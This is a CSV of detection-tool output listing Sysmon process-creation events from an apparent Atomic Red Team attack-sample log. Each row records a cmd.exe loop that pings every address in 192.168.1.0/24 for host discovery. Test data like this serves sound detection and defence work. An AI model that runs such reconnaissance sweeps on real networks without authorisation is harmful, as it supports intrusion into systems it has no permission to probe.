2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
